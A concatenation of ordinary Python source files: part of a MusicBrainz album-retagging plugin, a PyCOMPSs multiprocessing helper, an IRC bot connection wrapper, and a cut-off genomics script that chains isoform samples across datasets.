feats = re.findall(r' \(feat\. (.*?)\)', track.title)
if feats:
feat = []
for value in feats:
values = value.split(', ')
if len(values) > 1:
values += values.pop().split(' & ')
feat += values
song['performer'] = '\n'.join(feat)
song['title'] = re.sub(r' \(feat\. .*?\)', '', track.title)
self.destroy()
def __do_query(self, *args):
"""Search for album using the query text."""
query = self.search_query.get_text()
if not query:
self.result_label.set_markup("<b>Please enter a query.</b>")
self.search_button.set_sensitive(True)
return
self.result_label.set_markup("<i>Searching...</i>")
filt = ws.ReleaseFilter(query=query)
self._qthread.add(self.__process_results,
self._query.getReleases, filt)
def __process_results(self, results):
"""Callback for search query completion."""
self._resultlist.clear()
self.search_button.set_sensitive(True)
if results is None:
self.result_label.set_text("Error encountered. Please retry.")
self.search_button.set_sensitive(True)
return
for release in map(lambda r: r.release, results):
self._resultlist.append((release, ))
if len(results) > 0 and self.result_combo.get_active() == -1:
self.result_label.set_markup("<i>Loading result...</i>")
self.result_combo.set_active(0)
else:
self.result_label.set_markup("No results found.")
def __result_changed(self, combo):
"""Called when a release is chosen from the result combo."""
idx = combo.get_active()
if idx == -1:
return
rel_id = self._resultlist[idx][0].id
if rel_id in self._releasecache:
self.__update_results(self._releasecache[rel_id])
else:
self.result_label.set_markup("<i>Loading result...</i>")
inc = ws.ReleaseIncludes(
artist=True, releaseEvents=True, tracks=True)
self._qthread.add(self.__update_result,
self._query.getReleaseById, rel_id, inc)
def __update_result(self, release):
"""Callback for release detail download from result combo."""
num_results = len(self._resultlist)
text = ngettext("Found %d result.", "Found %d results.", num_results)
self.result_label.set_text(text % num_results)
# issue 973: search can return invalid (or removed) ReleaseIDs
if release is None:
return
self._releasecache.setdefault(extractUuid(release.id), release)
self.result_treeview.update_remote_album(release.tracks)
self.current_release = release
self.release_combo.update(release)
save_button = dialog_get_widget_for_stockid(self, Gtk.STOCK_SAVE)
save_button.set_sensitive(True)
def __init__(self, parent, album, cache):
self.album = album
self._query = ws.Query()
self._resultlist = Gtk.ListStore(GObject.TYPE_PYOBJECT)
self._releasecache = cache
self._qthread = QueryThread()
self.current_release = None
super(SearchWindow, self).__init__("MusicBrainz lookup", buttons=(
Gtk.STOCK_CANCEL, Gtk.ResponseType.REJECT,
Gtk.STOCK_SAVE, Gtk.ResponseType.ACCEPT))
self.set_default_size(650, 500)
self.set_border_width(5)
self.set_transient_for(parent)
save_button = dialog_get_widget_for_stockid(self, Gtk.STOCK_SAVE)
save_button.set_sensitive(False)
vb = Gtk.VBox()
vb.set_spacing(8)
hb = Gtk.HBox()
hb.set_spacing(8)
sq = self.search_query = Gtk.Entry()
sq.connect('activate', self.__do_query)
alb = '"%s"' % album[0].comma("album").replace('"', '')
art = get_artist(album)
if art:
alb = '%s AND artist:"%s"' % (alb, art.replace('"', ''))
sq.set_text('%s AND tracks:%d' %
(alb, get_trackcount(album)))
lbl = Gtk.Label(label="_Query:")
lbl.set_use_underline(True)
lbl.set_mnemonic_widget(sq)
stb = self.search_button = Gtk.Button('S_earch', use_underline=True)
stb.connect('clicked', self.__do_query)
hb.pack_start(lbl, False, True, 0)
hb.pack_start(sq, True, True, 0)
hb.pack_start(stb, False, True, 0)
vb.pack_start(hb, False, True, 0)
self.result_combo = ResultComboBox(self._resultlist)
self.result_combo.connect('changed', self.__result_changed)
vb.pack_start(self.result_combo, False, True, 0)
rhb = Gtk.HBox()
rl = Gtk.Label()
rl.set_markup("Results <i>(drag to reorder)</i>")
rl.set_alignment(0, 0.5)
rhb.pack_start(rl, False, True, 0)
rl = self.result_label = Gtk.Label(label="")
rhb.pack_end(rl, False, True, 0)
vb.pack_start(rhb, False, True, 0)
sw = Gtk.ScrolledWindow()
sw.set_shadow_type(Gtk.ShadowType.IN)
sw.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.ALWAYS)
rtv = self.result_treeview = ResultTreeView(self.album)
rtv.set_border_width(8)
sw.add(rtv)
vb.pack_start(sw, True, True, 0)
hb = Gtk.HBox()
hb.set_spacing(8)
self.release_combo = ReleaseEventComboBox()
vb.pack_start(self.release_combo, False, True, 0)
self.get_content_area().pack_start(vb, True, True, 0)
self.connect('response', self.__save)
stb.emit('clicked')
self.get_child().show_all()
class MyBrainz(SongsMenuPlugin):
PLUGIN_ID = "MusicBrainz lookup"
PLUGIN_NAME = "MusicBrainz Lookup"
PLUGIN_ICON = Gtk.STOCK_CDROM
PLUGIN_DESC = 'Retag an album based on a MusicBrainz search.'
PLUGIN_VERSION = '0.5'
cache = {}
def plugin_albums(self, albums):
if not albums:
return
def win_finished_cb(widget, *args):
if albums:
start_processing(albums.pop(0))
else:
self.plugin_finish()
def start_processing(disc):
win = SearchWindow(
self.plugin_window, disc, self.cache)
win.connect("destroy", win_finished_cb)
win.show()
start_processing(albums.pop(0))
@classmethod
def PluginPreferences(self, win):
items = [
('split_disc', 'Split _disc from album', True),
('split_feat', 'Split _featured performers from track', False),
('year_only', 'Only use year for "date" tag', False),
('albumartist', 'Write "_albumartist" when needed', True),
('artist_sort', 'Write sort tags for artist names', False),
('standard', 'Write _standard MusicBrainz tags', True),
('labelid', 'Write _labelid tag (fixes multi-disc albums)', True),
]
vb = Gtk.VBox()
vb.set_spacing(8)
for key, label, default in items:
ccb = ConfigCheckButton(label, 'plugins', 'brainz_' + key)
ccb.set_active(config_get(key, default))
vb.pack_start(ccb, True, True, 0)
return vb
|
manager.py
|
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs Util - process/manager
============================================
This file centralizes the multiprocessing management. It helps to
homogenize the behaviour between linux and mac.
"""
from pycompss.util.typing_helper import typing
import multiprocessing
from multiprocessing import Queue # Used only for typing
from multiprocessing import Process # Used only for typing
try:
from multiprocessing import Manager
from multiprocessing.shared_memory import SharedMemory # noqa
from multiprocessing.shared_memory import ShareableList # noqa
from multiprocessing.managers import SharedMemoryManager # noqa
except ImportError:
# Unsupported in python < 3.8
Manager = None # type: ignore
SharedMemory = None # type: ignore
ShareableList = None # type: ignore
SharedMemoryManager = None # type: ignore
def initialize_multiprocessing() -> None:
"""Set global mechanism to start multiprocessing processes.
https://docs.python.org/3/library/multiprocessing.html#contexts-and-start-methods # noqa: E501
Using fork even in MacOS.
WARNING: This method must be called only once and at the very beginning.
:return: None
"""
try:
multiprocessing.set_start_method("fork")
except AttributeError:
# Unsupported set_start_method (python 2 mainly).
# Use default start method.
pass
except RuntimeError:
# Already initialized
pass
def new_process() -> Process:
"""Instantiate a new empty process.
:return: Empty process
"""
return multiprocessing.Process()
def new_queue() -> Queue:
"""Instantiate a new queue.
:return: New queue
"""
return multiprocessing.Queue()
def new_manager() -> typing.Any:
"""Instantiate a new empty multiprocessing manager.
:return: Empty multiprocessing manager
"""
return Manager()
def create_process(target: typing.Any, args: tuple = ()) -> Process:
"""Create a new process instance for the given target with the provided
arguments.
:param target: Target function to execute in a multiprocessing process
:param args: Target function arguments
:return: New process
"""
process = multiprocessing.Process(target=target, args=args)
return process
def create_shared_memory_manager(
address: typing.Tuple[str, int], authkey: typing.Optional[bytes]
) -> SharedMemoryManager:
"""Create a new shared memory manager process at the given address with
the provided authkey.
:param address: Shared memory manager address (IP, PORT)
:param authkey: Shared memory manager authentication key
:return: New process
"""
smm = SharedMemoryManager(address=address, authkey=authkey)
return smm
|
ircwrapper.py
|
"""
Handle the IRC connection for the bot
"""
try:
from queue import Queue
except ImportError:
from Queue import Queue
from threading import Thread
from irc.bot import SingleServerIRCBot
from time import sleep, time
class Task(object):
"""
Container for a IRCWrapper task that can be passed through the Queue
between threads
"""
def __init__(self, method, *args, **kwargs):
self.method = method
self.args = args
self.kwargs = kwargs
def __str__(self):
return "<Task:(method={0},{1} args,{2} kwargs>".format(
self.method,
len(self.args),
len(self.kwargs)
)
class IRCWrapper(SingleServerIRCBot):
"""
Convenient wrapper for the irc class methods, rate limits the messages
sent to the server to avoid being banned for spamming.
"""
def __init__(self, logger=None, bot=None, settings=None, channelList=None,
nickname=None,
server=None, password=None,
port=6667, commandPrefix='!'):
self.bot = bot
self.logger = logger
self.channelList = channelList
self.commandPrefix = commandPrefix
self.queue = Queue()
self.irc_thread = None
self.call_thread = None
self.out_thread = None
self.call_relay = None
if bot:
self.queue_delay = settings.QUEUE_DELAY
else:
self.queue_delay = 1
serverList = []
if server:
if password:
self.logger.info(
"Connecting to {0}:{1} using a password".format(
server, port
))
serverList.append((server, port, password))
else:
self.logger.info(
"Connecting to {0}:{1} with no password".format(
server, port
))
serverList.append((server, port))
super(IRCWrapper, self).__init__(
server_list=serverList,
nickname=nickname,
realname=nickname,
reconnection_interval=15,
)
# Public API
def set_call_relay(self, call_relay):
self.call_relay = call_relay
def call_relay_loop():
if self.call_relay:
self.call_relay.loop()
self.call_thread = Thread(target=call_relay_loop)
self.call_thread.daemon = True
self.call_thread.start()
def start(self):
"""
Start the IRC connection and thread
:return: None
"""
self._start_threads()
def stop(self):
"""
Stop our threads etc.
:return: None
"""
self.queue.put(None)
self.call_relay.stop()
def message(self, channel, message):
"""
Request to send a message to the channel, request is placed in output
buffering task queue.
:param channel: The channel to send the message to
:param message: The message to be sent
:return: None
"""
lines = message.split("\n")
if len(lines) > 3:
lines = lines[-3:]
for line in lines:
self.queue.put(Task(
"_send_message",
channel,
line
))
def is_oper(self, channel, nick):
"""
Check if the user is an operator/moderator in the channel
:param channel: Which channel
:param nick: What is the user's nick
:return:
"""
return self.channels[channel].is_oper(nick)
def get_users(self, channel):
"""
Get the users currently in the given channel
:param channel: Which channel
:return:
"""
users = []
if channel in self.channels:
users = self.channels[channel].users()
return users
def _start_threads(self):
"""
Start a thread that will work on the tasks while preventing us from
getting banned on Twitch servers etc.
:return: None
"""
def worker():
while True:
task = self.queue.get()
if task == None:
return
self._process_task(task)
sleep(self.queue_delay)
self.out_thread = Thread(target=worker)
self.out_thread.daemon = True
self.out_thread.start()
def irc():
super(IRCWrapper, self).start()
self.irc_thread = Thread(target=irc)
self.irc_thread.daemon = True
self.irc_thread.start()
def _process_task(self, task):
"""
Process a single Task
:param task: An instance of the Task class
:return: None
"""
method = getattr(self, task.method)
if not method:
raise ValueError("No method {0} in IRC wrapper?".format(
task.method
))
method(*task.args, **task.kwargs)
def _send_message(self, channel, message):
"""
Actually send a message on a channel
:param channel: The channel to send the message to
:param message: The message to be sent
:return: None
"""
self.connection.privmsg(channel, message)
def on_disconnect(self, connection, event):
"""
Event handler run when the bot is disconnected from the server
:param connection: The irc connection object
:param event: An event containing more relevant info
:return: None
"""
self.logger.warn("Got disconnected from server: {0}".format(
repr(event)
))
msg = "Disconnected from server, reconnecting. " \
"Are your login details correct?"
for channel in self.channelList:
self.bot.console(channel, msg)
def on_welcome(self, connection, event):
"""
Event handler run after connection to server has been established,
joins the channels the bot should be on.
:param connection: The irc connection object
:param event: An event containing more relevant info
:return: None
"""
self.logger.info("Connected to server, joining channels...")
msg = "Connected to IRC server! Joining {0}."
for channel in self.channelList:
self.bot.console(channel, msg.format(channel))
self.logger.info("Joining channel {0}".format(channel))
connection.join(channel.lower())
def on_join(self, connection, event):
"""
Event handler run when the bot joins a channel, and in case of
Twitch for some other unknown reason(s) as well.
:param connection: The irc connection object
:param event: An event containing more relevant info
:return: None
"""
channel = self._get_event_channel(event)
self.logger.info("Joined {0}".format(channel))
def on_pubmsg(self, connection, event, timestamp=None):
"""
Event handler run when the bot seems a new message on any channel
:param connection: The irc connection object
:param event: An event containing more relevant info
:return: None
"""
text = self._get_event_text(event)
channel = self._get_event_channel(event)
nick = self._get_event_nick(event)
if timestamp is None:
timestamp = time()
cmd = False
command, args = self._get_command(text)
if command:
cmd = self.bot.irc_command(channel, nick, command, args, timestamp)
if not cmd:
self.bot.chat_message(channel, nick, text, timestamp)
def _get_event_channel(self, event):
"""
Extract the channel name from the given event
:param event: An event object
:return: The channel name the event occured on
"""
return event.target
def _get_event_text(self, event):
"""
Extract the message text from a message event
:param event: A message event
:return: The message text
"""
return event.arguments[0]
def _get_event_nick(self, event):
"""
Get the nick for the user that triggered this message event
:param event: A message event
:return: The user's nick
"""
return event.source.nick
def _get_command(self, text):
"""
Extract any command on the given chat line
>>> from bot.ircwrapper import IRCWrapper
>>> i = IRCWrapper()
>>> i._get_command("!def")
('def', [])
>>> i._get_command("!foo bar")
('foo', ['bar'])
>>> i._get_command("abc 123")
(None, 'abc 123')
:param text: A line of text from the chat
:return: Command name and remainder text, or if no command found
None, original text
"""
if not text.startswith(self.commandPrefix):
return None, text
# Strip off the command prefix
text = text[len(self.commandPrefix):].strip()
# Take the first word, in lowercase
parts = text.split(' ')
command = parts[0].lower()
args = parts[1:]
return command, args
|
chain_samples.py
|
__author__ = 'etseng@pacb.com'
#!/usr/bin/env python
import os, sys, glob, shutil
import pdb
from multiprocessing import Process
from csv import DictReader, DictWriter
from collections import defaultdict, OrderedDict
from Bio import SeqIO
from bx.intervals.cluster import ClusterTree
from cupcake.io import GFF
from cupcake.tofu.counting import combine_abundance_across_samples as sp
def sample_sanity_check(group_filename, gff_filename, count_filename, fastq_filename=None):
"""
Double check that the formats are expected and all PBIDs are concordant across the files
:return: raise Exception if sanity check failed
"""
print("Sanity checking. Retrieving PBIDs from {0},{1},{2}...".format(\
group_filename, gff_filename, count_filename), file=sys.stderr)
ids1 = [line.strip().split()[0] for line in open(group_filename)]
ids2 = [r.seqid for r in GFF.collapseGFFReader(gff_filename)]
f = open(count_filename)
while True:
# advance through the headers which start with #
cur = f.tell()
if not f.readline().startswith('#') or f.tell() == cur: # first non-# seen or EOF
f.seek(cur)
break
ids3 = [r['pbid'] for r in DictReader(f, delimiter='\t')]
if len(set(ids2).difference(ids1))>0 or len(set(ids2).difference(ids3))>0:
raise Exception("Sanity check failed! Please make sure the PBIDs listed in {1} are also in {0} and {2}".format(\
group_filename, gff_filename, count_filename))
if fastq_filename is not None:
ids4 = [r.id.split('|')[0] for r in SeqIO.parse(open(fastq_filename), 'fastq')]
if len(set(ids2).difference(ids4))>0:
raise Exception("Sanity check failed! Please make sure the PBIDs listed in {1} are also in {0}".format(\
fastq_filename, gff_filename))
def read_config(filename):
"""
tmpSAMPLE=<name>;<path>
SAMPLE=<name>;<path>
must also have
GROUP_FILENAME=
GFF_FILENAME=
COUNT_FILENAME=
optional:
FASTQ_FILENAME=
"""
sample_dirs = {}
sample_names = []
group_filename, gff_filename, count_filename = None, None, None
fastq_filename = None
no_more_tmp = False
with open(filename) as f:
for line in f:
if line.startswith('tmpSAMPLE='):
if no_more_tmp:
print("Cannot have tmp_ samples after non-tmp_ samples! Abort!", file=sys.stderr)
sys.exit(-1)
name, path = line.strip()[len('tmpSAMPLE='):].split(';')
if name.startswith('tmp_'):
print("Sample names are not allowed to start with tmp_! Please change {0} to something else.".format(name), file=sys.stderr)
sys.exit(-1)
sample_dirs[name] = os.path.abspath(path)
sample_names.append('tmp_'+name)
elif line.startswith('SAMPLE='):
no_more_tmp = True
name, path = line.strip()[len('SAMPLE='):].split(';')
if name.startswith('tmp_'):
print("Sample names are not allowed to start with tmp_! Please change {0} to something else.".format(name), file=sys.stderr)
sys.exit(-1)
sample_dirs[name] = os.path.abspath(path)
sample_names.append(name)
elif line.startswith('GROUP_FILENAME='):
group_filename = line.strip()[len('GROUP_FILENAME='):]
elif line.startswith('GFF_FILENAME='):
gff_filename = line.strip()[len('GFF_FILENAME='):]
elif line.startswith('COUNT_FILENAME='):
count_filename = line.strip()[len('COUNT_FILENAME='):]
elif line.startswith('FASTQ_FILENAME='):
fastq_filename = line.strip()[len('FASTQ_FILENAME='):]
if group_filename is None:
raise Exception("Expected GROUP_FILENAME= but not in config file {0}! Abort.".format(filename))
if count_filename is None:
raise Exception("Expected COUNT_FILENAME= but not in config file {0}! Abort.".format(filename))
if gff_filename is None:
raise Exception("Expected GFF_FILENAME= but not in config file {0}! Abort.".format(filename))
if len(sample_names) == 0:
print("No samples given. Exit.", file=sys.stderr)
sys.exit(-1)
return sample_dirs, sample_names, group_filename, gff_filename, count_filename, fastq_filename
def read_count_info(count_filename, dirs, field_to_use):
count_info = {} # key: (sample, PB.1.1) --> count
count_header = ''
for name, d in dirs.items():
f = open(os.path.join(d, count_filename))
while True:
cur = f.tell()
line = f.readline().strip()
if not line.startswith('#'): break
count_header += line
f.seek(cur)
for r in DictReader(f, delimiter='\t'):
count_info[name, r['pbid']] = r[field_to_use]
return count_header, count_info
def chain_split_file(ref_gff, ref_group, ref_name, addon_gff, addon_group, addon_name, fuzzy_junction, allow_5merge, max_3_diff, n_chunks):
addon_group_info = sp.MegaPBTree.read_group(addon_group, None)
recs = []
tree = OrderedDict()
i = 0
for r in GFF.collapseGFFReader(addon_gff):
if r.chr not in tree:
tree[r.chr] = {'+':ClusterTree(0,0), '-':ClusterTree(0,0)}
tree[r.chr][r.strand].insert(r.start, r.end, i)
recs.append(r)
i += 1
n = len(recs)
chunk_size = (n//n_chunks) + (n%n_chunks>0)
split_files = []
i = 0
counter = 0
f_gff = open(addon_gff + '.split' + str(i), 'w')
f_group = open(addon_group + '.split' + str(i), 'w')
for v1 in tree.values():
for strand in ('+','-'):
v2 = v1[strand]
for _start, _end, _indices in v2.getregions():
for cur in _indices:
GFF.write_collapseGFF_format(f_gff, recs[cur])
f_group.write("{0}\t{1}\n".format(recs[cur].seqid, ",".join(addon_group_info[recs[cur].seqid])))
counter += 1
if counter >= (i+1)*chunk_size:
i += 1
f_gff.close()
f_group.close()
split_files.append((f_gff.name, f_group.name))
f_gff = open(addon_gff+'.split'+str(i), 'w')
f_group = open(addon_group + '.split' + str(i), 'w')
if not f_gff.closed:
f_gff.close()
f_group.close()
split_files.append((f_gff.name, f_group.name))
result_prefixes = []
pools = []
for i,(split_gff,split_group) in enumerate(split_files):
p = Process(target=chain_helper, args=(ref_gff, ref_group, split_gff, split_group, ref_name, addon_name+'.'+str(i), fuzzy_junction, allow_5merge, max_3_diff))
p.start()
pools.append(p)
result_prefixes.append((ref_name, addon_name+'.'+str(i)))
for p in pools:
p.join()
return result_prefixes, split_files
def chain_helper(ref_gff, ref_group, addon_gff, addon_group, name1, name2, fuzzy_junction, allow_5merge, max_3_diff):
o = sp.MegaPBTree(ref_gff, ref_group, self_prefix=name1, \
internal_fuzzy_max_dist=fuzzy_junction, \
allow_5merge=allow_5merge, \
max_3_diff=max_3_diff, \
fastq_filename=None)
o.add_sample(addon_gff, addon_group, \
sample_prefix=name2, output_prefix='tmp_' + name2, \
fastq_filename=None)
def combine_split_chained_results(output_prefixes, final_prefix, ref_gff, ref_group, ref_name, ref_fq, addon_gff, addon_group, addon_name, addon_fq):
"""
Each <output_prefix> will have .gff, .group.txt, .mega_info.txt.
There should be NO overlap between the split files, so clean merge should be possible!
1. read the .gff files, record the group and mega (id-map) info
2. sort the total records so can properly put on a unified superPBID
3. write out the unified result
4. delete the split files
"""
# sanity check files are all there
split_files = [] # tuple of (gff, group, mega)
for ref_name,o in output_prefixes:
gff_file = 'tmp_' + o + '.gff'
mega_file = 'tmp_' + o + '.mega_info.txt'
group_file = 'tmp_' + o + '.group.txt'
if not os.path.exists(gff_file) or not os.path.exists(mega_file) or not os.path.exists(group_file):
print("Expects to see {0},{1},{2} but one or more files are missing! Abort!".format(gff_file, mega_file, group_file), file=sys.stderr)
sys.exit(-1)
split_files.append((ref_name, o, gff_file, group_file, mega_file))
use_fq = False
if ref_fq is not None and addon_fq is not None:
use_fq = True
ref_fq_dict = dict((r.id.split('|')[0], r) for r in SeqIO.parse(open(ref_fq),'fastq'))
addon_fq_dict = dict((r.id.split('|')[0], r) for r in SeqIO.parse(open(addon_fq), 'fastq'))
mega_info = {} # ref id -> list of matching query_id, or empty list
split_unmatched = set()
for (ref_name, split_name, gff_file, group_file, mega_file) in split_files:
for r in DictReader(open(mega_file), delimiter='\t'):
if r[ref_name]!='NA':
if r[ref_name] not in mega_info:
mega_info[r[ref_name]] = []
if r[split_name]!='NA':
mega_info[r[ref_name]].append(r[split_name])
else: # ref is NA, non-ref is not NA
split_unmatched.add(r[split_name])
# make a rec list of matches of (ref_id, addon_id, representative record, combined group info) where rec_ref or ref_addon could be None, but not both
rec_list = []
d_ref = dict((r.seqid, r) for r in GFF.collapseGFFReader(ref_gff))
d_addon = dict((r.seqid, r) for r in GFF.collapseGFFReader(addon_gff))
ref_group_info = sp.MegaPBTree.read_group(ref_group, None)
addon_group_info = sp.MegaPBTree.read_group(addon_group, None)
for ref_id, matches in mega_info.items():
if len(matches) == 0: rec_list.append(sp.MatchRecord(ref_id=ref_id, addon_id='NA', rec=d_ref[ref_id],
members=ref_group_info[ref_id],
seqrec=ref_fq_dict[ref_id] if use_fq else None))
else:
for addon_id in matches:
r1 = d_ref[ref_id]
r2 = d_addon[addon_id]
if (r1.end - r1.start) > (r2.end - r2.start):
rec_list.append(sp.MatchRecord(ref_id=ref_id, addon_id=addon_id, rec=r1,
members=ref_group_info[ref_id]+addon_group_info[addon_id],
seqrec=ref_fq_dict[ref_id] if use_fq else None))
else:
rec_list.append(sp.MatchRecord(ref_id=ref_id, addon_id=addon_id, rec=r2,
members=ref_group_info[ref_id]+addon_group_info[addon_id],
seqrec=addon_fq_dict[addon_id] if use_fq else None))
for addon_id in split_unmatched:
rec_list.append(sp.MatchRecord(ref_id='NA', addon_id=addon_id, rec=d_addon[addon_id],
members=addon_group_info[addon_id],
seqrec=addon_fq_dict[addon_id] if use_fq else None))
sp.write_reclist_to_gff_n_info(rec_list, final_prefix, ref_name, addon_name, use_fq)
for (ref_name, split_name, gff_file, group_file, mega_file) in split_files:
os.remove(gff_file)
os.remove(group_file)
os.remove(mega_file)
def chain_samples(dirs, names, group_filename, gff_filename, count_filename, field_to_use='count_fl', fuzzy_junction=0, allow_5merge=False, max_3_diff=100, fastq_filename=None):
for d in dirs.values():
sample_sanity_check(os.path.join(d, group_filename),\
os.path.join(d, gff_filename),\
os.path.join(d, count_filename),\
os.path.join(d, fastq_filename) if fastq_filename is not None else None)
count_header, count_info = read_count_info(count_filename, dirs, field_to_use)
# some names may already start with "tmp_" which means they are intermediate results that have already been chained
# find the first non "tmp_" and start from there
if names[0].startswith('tmp_'):
chain = []
for start_i,name in enumerate(names):
if name.startswith('tmp_'):
chain.append(name[4:])
else:
break
# start_i, name now points at the first "non-tmp" sample
# we want to go to the last tmp_ sample and read it
name = names[start_i-1][4:] # this is the last tmp_ sample, let's read it
o = sp.MegaPBTree('tmp_'+name+'.gff', 'tmp_'+name+'.group.txt', self_prefix='tmp_'+name, \
internal_fuzzy_max_dist=fuzzy_junction, \
allow_5merge=allow_5merge, \
max_3_diff=max_3_diff, \
fastq_filename='tmp_'+name+'.rep.fq' if fastq_filename is not None else None)
#chain.append(name) # no need, already done above
else: # everything is new, start fresh
name = names[0]
d = dirs[name]
chain = [name]
o = sp.MegaPBTree(os.path.join(d, gff_filename), os.path.join(d, group_filename), \
self_prefix=name, internal_fuzzy_max_dist=fuzzy_junction, \
allow_5merge=allow_5merge, \
max_3_diff=max_3_diff, \
fastq_filename=os.path.join(d, fastq_filename) if fastq_filename is not None else None)
start_i = 1
for name in names[start_i:]:
assert not name.startswith('tmp_')
d = dirs[name]
o.add_sample(os.path.join(d, gff_filename), os.path.join(d, group_filename), \
sample_prefix=name, output_prefix='tmp_'+name, \
fastq_filename=os.path.join(d, fastq_filename) if fastq_filename is not None else None)
o = sp.MegaPBTree('tmp_'+name+'.gff', 'tmp_'+name+'.group.txt', self_prefix='tmp_'+name, \
internal_fuzzy_max_dist=fuzzy_junction, \
allow_5merge=allow_5merge, \
max_3_diff=max_3_diff, \
fastq_filename='tmp_'+name+'.rep.fq' if fastq_filename is not None else None)
chain.append(name)
# now recursively chain back by looking at mega_info.txt!!!
d = {} # ex: (tmp_1009, PB.1.1) --> mega info dict
for c in chain[1:]:
for r in DictReader(open('tmp_' + c + '.mega_info.txt'),delimiter='\t'):
d['tmp_'+c, r['superPBID']] = r
f1 = open('all_samples.chained_ids.txt', 'w')
writer1 = DictWriter(f1, fieldnames=['superPBID']+chain, delimiter='\t')
writer1.writeheader()
f2 = open('all_samples.chained_count.txt', 'w')
writer2 = DictWriter(f2, fieldnames=['superPBID']+chain, delimiter='\t')
writer2.writeheader()
reader = DictReader(open('tmp_' + chain[-1] + '.mega_info.txt'),delimiter='\t')
for r in reader:
saw_NA = False
r0 = r
answer = defaultdict(lambda: 'NA') # ex: 1009 --> PB.1.1
answer2 = defaultdict(lambda: 'NA') # ex: 1009 --> count
answer[chain[-1]] = r[chain[-1]]
if r[chain[-1]] !='NA':
answer2[chain[-1]] = count_info[chain[-1], answer[chain[-1]]]
for c in chain[::-1][1:-1]: # the first sample does not have tmp_, because it's not a chain
if r['tmp_'+c] == 'NA':
saw_NA = True
break
else:
r2 = d['tmp_'+c, r['tmp_'+c]]
answer[c] = r2[c]
if answer[c] != 'NA':
answer2[c] = count_info[c, answer[c]]
r = r2
if not saw_NA:
answer[chain[0]] = r[chain[0]]
if answer[chain[0]] !='NA':
answer2[chain[0]] = count_info[chain[0], answer[chain[0]]]
rec1 = {'superPBID': r0['superPBID']}
rec2 = {'superPBID': r0['superPBID']}
for c in chain:
rec1[c] = answer[c]
rec2[c] = str(answer2[c])
writer1.writerow(rec1)
writer2.writerow(rec2)
f1.close()
f2.close()
shutil.copyfile('tmp_' + chain[-1] + '.gff', 'all_samples.chained.gff')
if fastq_filename is not None:
shutil.copyfile('tmp_' + chain[-1] + '.rep.fq', 'all_samples.chained.rep.fq')
print("Chained output written to:", file=sys.stdout)
print("all_samples.chained.gff", file=sys.stdout)
print(f1.name, file=sys.stdout)
print(f2.name, file=sys.stdout)
if fastq_filename is not None:
print("all_samples.chained.rep.fq", file=sys.stdout)
def chain_samples_multithread(dirs, names, group_filename, gff_filename, count_filename, field_to_use='count_fl', fuzzy_junction=0, allow_5merge=False, max_3_diff=100, fastq_filename=None, cpus=4):
for d in dirs.values():
sample_sanity_check(os.path.join(d, group_filename),\
os.path.join(d, gff_filename),\
os.path.join(d, count_filename),\
os.path.join(d, fastq_filename) if fastq_filename is not None else None)
count_header, count_info = read_count_info(count_filename, dirs, field_to_use)
# some names may already start with "tmp_" which means they are intermediate results that have already been chained
# find the first non "tmp_" and start from there
if names[0].startswith('tmp_'):
chain = []
for start_i,name in enumerate(names):
if name.startswith('tmp_'):
chain.append(name[4:])
else:
break
# start_i, name now points at the first "non-tmp" sample
# we want to go to the last tmp_ sample and read it
name = names[start_i-1][4:] # this is the last tmp_ sample, let's read it
first_add = False
else: # everything is new, start fresh
name = names[0]
chain = [name]
start_i = 1
first_add = True
for addon_name in names[start_i:]:
assert not addon_name.startswith('tmp_')
ref_name = chain[-1]
ref_d = dirs[ref_name]
if first_add:
ref_gff = os.path.join(ref_d, gff_filename)
ref_group = os.path.join(ref_d, group_filename)
ref_fq = os.path.join(ref_d, fastq_filename) if fastq_filename is not None else None
else:
ref_name = 'tmp_' + ref_name
ref_gff = ref_name + '.gff'
ref_group = ref_name + '.group.txt'
ref_fq = ref_name + '.rep.fq' if fastq_filename is not None else None
addon_d = dirs[addon_name]
addon_gff = os.path.join(addon_d, gff_filename)
addon_group = os.path.join(addon_d, group_filename)
addon_fq = os.path.join(addon_d, fastq_filename) if fastq_filename is not None else None
split_outs, split_ins = chain_split_file(ref_gff=ref_gff,
ref_group=ref_group,
ref_name=ref_name,
addon_gff=addon_gff,
addon_group=addon_group,
addon_name=addon_name,
fuzzy_junction=fuzzy_junction,
allow_5merge=allow_5merge,
max_3_diff=max_3_diff,
n_chunks=cpus)
combine_split_chained_results(split_outs,
final_prefix='tmp_'+addon_name,
ref_gff=ref_gff,
ref_group=ref_group,
ref_name=ref_name,
ref_fq=ref_fq,
addon_gff=addon_gff,
addon_group=addon_group,
addon_name=addon_name,
addon_fq=addon_fq)
chain.append(addon_name)
for in_gff_split, in_group_split in split_ins:
os.remove(in_gff_split) # remove the split gff
os.remove(in_group_split)
first_add = False
# now recursively chain back by looking at mega_info.txt!!!
d = {} # ex: (tmp_sample1, PB.1.1) --> mega info dict
for c in chain[1:]:
for r in DictReader(open('tmp_' + c + '.mega_info.txt'),delimiter='\t'):
d['tmp_'+c, r['superPBID']] = r
f1 = open('all_samples.chained_ids.txt', 'w')
writer1 = DictWriter(f1, fieldnames=['superPBID']+chain, delimiter='\t')
writer1.writeheader()
f2 = open('all_samples.chained_count.txt', 'w')
writer2 = DictWriter(f2, fieldnames=['superPBID']+chain, delimiter='\t')
writer2.writeheader()
reader = DictReader(open('tmp_' + chain[-1] + '.mega_info.txt'),delimiter='\t')
for r in reader:
saw_NA = False
r0 = r
answer = defaultdict(lambda: 'NA') # ex: 1009 --> PB.1.1
answer2 = defaultdict(lambda: 'NA') # ex: 1009 --> count
answer[chain[-1]] = r[chain[-1]]
if r[chain[-1]] !='NA':
answer2[chain[-1]] = count_info[chain[-1], answer[chain[-1]]]
for c in chain[::-1][1:-1]: # the first sample does not have tmp_, because it's not a chain
if r['tmp_'+c] == 'NA':
saw_NA = True
break
else:
r2 = d['tmp_'+c, r['tmp_'+c]]
answer[c] = r2[c]
if answer[c] != 'NA':
answer2[c] = count_info[c, answer[c]]
r = r2
if not saw_NA:
answer[chain[0]] = r[chain[0]]
if answer[chain[0]] !='NA':
answer2[chain[0]] = count_info[chain[0], answer[chain[0]]]
